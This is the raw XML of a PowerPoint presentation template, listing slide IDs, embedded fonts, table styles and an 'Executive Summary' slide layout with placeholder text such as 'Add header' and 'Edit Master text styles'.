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56" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="294" r:id="rId8"/>
    <p:sldId id="262" r:id="rId9"/>
    <p:sldId id="263" r:id="rId10"/>
    <p:sldId id="264" r:id="rId11"/>
    <p:sldId id="265" r:id="rId12"/>
    <p:sldId id="266" r:id="rId13"/>
    <p:sldId id="267" r:id="rId14"/>
    <p:sldId id="268" r:id="rId15"/>
    <p:sldId id="269" r:id="rId16"/>
    <p:sldId id="270" r:id="rId17"/>
    <p:sldId id="271" r:id="rId18"/>
    <p:sldId id="272" r:id="rId19"/>
    <p:sldId id="295" r:id="rId20"/>
    <p:sldId id="273" r:id="rId21"/>
    <p:sldId id="296" r:id="rId22"/>
    <p:sldId id="274" r:id="rId23"/>
    <p:sldId id="297"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8" r:id="rId44"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="9144000" cy="5143500"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Dosis" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId46"/>
      <p:bold r:id="rId47"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Dosis Light" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId48"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Dosis Regular" charset="0"/>
      <p:regular r:id="rId49"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Dosis-medium" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId50"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Nunito" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId51"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId52"/>
      <p:bold r:id="rId53"/>
      <p:italic r:id="rId54"/>
      <p:boldItalic r:id="rId55"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Unica One" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId56"/>
      <p:bold r:id="rId57"/>
    </p:embeddedFont>
  </p:embeddedFontLst>
  <p:custDataLst>
    <p:tags r:id="rId58"/>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CE5C5E43-6BC0-4618-BB44-37CFE357241E}" styleName="Style 3">
    <a:wholeTbl>
      <a:tcTxStyle>
        <a:fontRef idx="minor">
          <a:srgbClr val="000000"/>
        </a:fontRef>
        <a:schemeClr val="tx1"/>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr>
          <a:left>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </a:left>
          <a:right>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </a:right>
          <a:top>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </a:top>
          <a:bottom>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </a:bottom>
          <a:insideH>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </a:insideH>
          <a:insideV>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </a:insideV>
        </a:tcBdr>
        <a:fill>
          <a:noFill/>
        </a:fill>
      </a:tcStyle>
    </a:wholeTbl>
    <a:band1H>
      <a:tcStyle>
        <a:tcBdr/>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:alpha val="19999"/>
            </a:schemeClr>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:band1H>
    <a:band1V>
      <a:tcStyle>
        <a:tcBdr/>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:alpha val="19999"/>
            </a:schemeClr>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:band1V>
    <a:lastCol>
      <a:tcTxStyle b="on"/>
      <a:tcStyle>
        <a:tcBdr/>
      </a:tcStyle>
    </a:lastCol>
    <a:firstCol>
      <a:tcTxStyle b="on"/>
      <a:tcStyle>
        <a:tcBdr/>
      </a:tcStyle>
    </a:firstCol>
    <a:lastRow>
      <a:tcTxStyle b="on"/>
      <a:tcStyle>
        <a:tcBdr>
          <a:top>
            <a:ln w="50800">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </a:top>
        </a:tcBdr>
        <a:fill>
          <a:noFill/>
        </a:fill>
      </a:tcStyle>
    </a:lastRow>
    <a:firstRow>
      <a:tcTxStyle b="on"/>
      <a:tcStyle>
        <a:tcBdr>
          <a:bottom>
            <a:ln w="25400">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6" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="102" d="100"/>
          <a:sy n="102" d="100"/>
        </p:scale>
        <p:origin x="898"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11/12/2025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Executive Summary">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{3F314758-A266-484B-8F3D-7F26865CB86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D52544-41AF-4342-BA08-C67D109C4D0B}"/>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Rectangle 6">
            <a:extLst>
              <a:ext uri="{7CB551D7-BFAC-4F54-8B46-AA1C62E2690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66D8EFC-6336-449D-BF7D-1B8EB34A98C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="68580" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="47BEA8"/>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5">
            <a:extLst>
              <a:ext uri="{C227B83E-F572-48BD-A50C-DFB7A089C1C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959234B-980C-44A3-81FF-7B8D3834F1E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8599983" y="469057"/>
            <a:ext cx="369463" cy="273843"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r">
              <a:defRPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3478B6"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{AE068CE7-B732-4D25-B212-A764BEE821BA}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Picture Placeholder 18">
            <a:extLst>
              <a:ext uri="{EA6AA6FB-C8A3-4136-A70D-C711434D85C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88EBFA4-B4C2-449F-A847-AA66F374009C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7980760" y="4746804"/>
            <a:ext cx="919162" cy="221403"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:defRPr lang="en-US" sz="1400" baseline="0" dirty="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add logo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 10">
            <a:extLst>
              <a:ext uri="{19F63B13-B0E9-4692-A19C-4AFBA6A583D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2B69B4-3853-417D-B17B-943B95BF16F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="424957" y="1043406"/>
            <a:ext cx="5522433" cy="571500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0">
              <a:defRPr lang="en-US" sz="2400" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>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Add header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{41626C65-7DD6-43EC-8B7E-FA3A0D78C05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D8FF94-6626-4EF4-A07C-8F9C02E2233B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="5094636"/>
            <a:ext cx="0" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
              <a:latin typeface="Dosis Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{DE153736-6E3C-403A-A74B-82B3CBFDD94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E0EDDF8-CC9E-4F4B-8644-BC4FBBECCCD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428625" y="1761391"/>
            <a:ext cx="5528252" cy="885053"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1400"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stStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add body text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Connector 8">
            <a:extLst>
              <a:ext uri="{6042B675-8AB7-4EDB-9BE8-DD82E0D8A0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FD72CC1-DBF3-49E1-8B07-B6EB934CCF03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="4190524"/>
            <a:ext cx="5751194" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Picture Placeholder 9">
            <a:extLst>
              <a:ext uri="{930E6139-3897-4C85-98D6-C124368178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280480-4691-4BE9-8568-F1AA91EC79E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="2847975"/>
            <a:ext cx="1333500" cy="1156687"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 10">
            <a:extLst>
              <a:ext uri="{767B2FF7-F5CF-450C-B763-A19E912DF3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3BE773-6C8F-4C66-9D32-10656E93A2F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="4305300"/>
            <a:ext cx="1500920" cy="304561"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D14B24"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 11">
            <a:extLst>
              <a:ext uri="{9E9D1F8E-2DDD-48F1-B023-679742228D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5078F1-A8A4-4BD2-8681-16C697EF6165}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="4619625"/>
            <a:ext cx="1510407" cy="284559"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Picture Placeholder 12">
            <a:extLst>
              <a:ext uri="{61000B28-A00D-4DE1-A19F-D72A457FB10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4713D12-BD36-4528-9C37-08CEE7F4FCDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2190750" y="2847975"/>
            <a:ext cx="1333500" cy="1152525"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Title 13">
            <a:extLst>
              <a:ext uri="{751EE684-7EDF-4BF9-AFFB-4E7DE4D80E1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B5B174-349E-44C2-AC30-D8C627348760}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066925" y="4305300"/>
            <a:ext cx="1574587" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D14B24"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Title 14">
            <a:extLst>
              <a:ext uri="{11CFE885-E396-48BA-948C-026A8E44B65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9BDE58A-9DB3-412F-B403-36A0C69B485A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066925" y="4619625"/>
            <a:ext cx="1574587" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Picture Placeholder 15">
            <a:extLst>
              <a:ext uri="{D05F356E-1C88-418D-B971-7329962E302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16BEFA-4320-4356-A7AF-1AFA96FF3EEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4000500" y="2847975"/>
            <a:ext cx="1333500" cy="1152525"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Title 16">
            <a:extLst>
              <a:ext uri="{1367CD06-F000-44FE-957F-68F00353A9A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09620A-0C68-47B1-AA7E-75E05F79B87B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3876675" y="4305300"/>
            <a:ext cx="1571625" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D14B24"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Title 17">
            <a:extLst>
              <a:ext uri="{FD326177-1C04-4DB9-9B4B-F126485AFB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E3C2CB1-B67A-4F79-99D6-60E5B9605778}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3876675" y="4619625"/>
            <a:ext cx="1574587" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Title 18">
            <a:extLst>
              <a:ext uri="{E1939EB1-ED1D-4C91-B707-148E56AF63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1B4C44-EF16-40BF-8226-AD9195E82503}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="13"/>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20" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{F473F702-AB82-4282-9CFB-7B76673169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242B86-B87D-41E7-B3EF-3E13DE9FA56A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="14"/>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E77FE2BF-35A5-43CE-A260-443D2EA4DAB3}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{50DF4899-F473-43EF-B71C-18D47AEA4DB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78A51A4-780E-404F-B4B7-D2F722749CB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="15"/>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A812DA6A-4D63-494A-BED5-96774F50B78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5">
            <a:extLst>
              <a:ext uri="{BC71F1AF-5DE4-4A9A-865B-13639423ACE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952A6C1-7B1E-4E8F-9177-420738C4165D}"/>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8AC7AACD-453A-43FC-AF4B-D3377499A3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E85A306-6CCF-4D99-9700-C33E9FEA56D5}"/>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0575700A-EA6A-4F26-BB39-A838AA6A0076}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Picture Placeholder 18">
            <a:extLst>
              <a:ext uri="{E13B25B7-BD63-4BEB-8781-B791826A8C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1A1280C-8B53-420D-A04F-6EB41B9515E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7980760" y="4746804"/>
            <a:ext cx="919162" cy="221403"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:defRPr lang="en-US" sz="1400" baseline="0" dirty="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Place Logo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{2758A689-75E3-4C92-96CE-1F0B41A7009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7658735-21C9-4539-8F58-CD833AABA6C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="448226" y="5285132"/>
            <a:ext cx="0" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
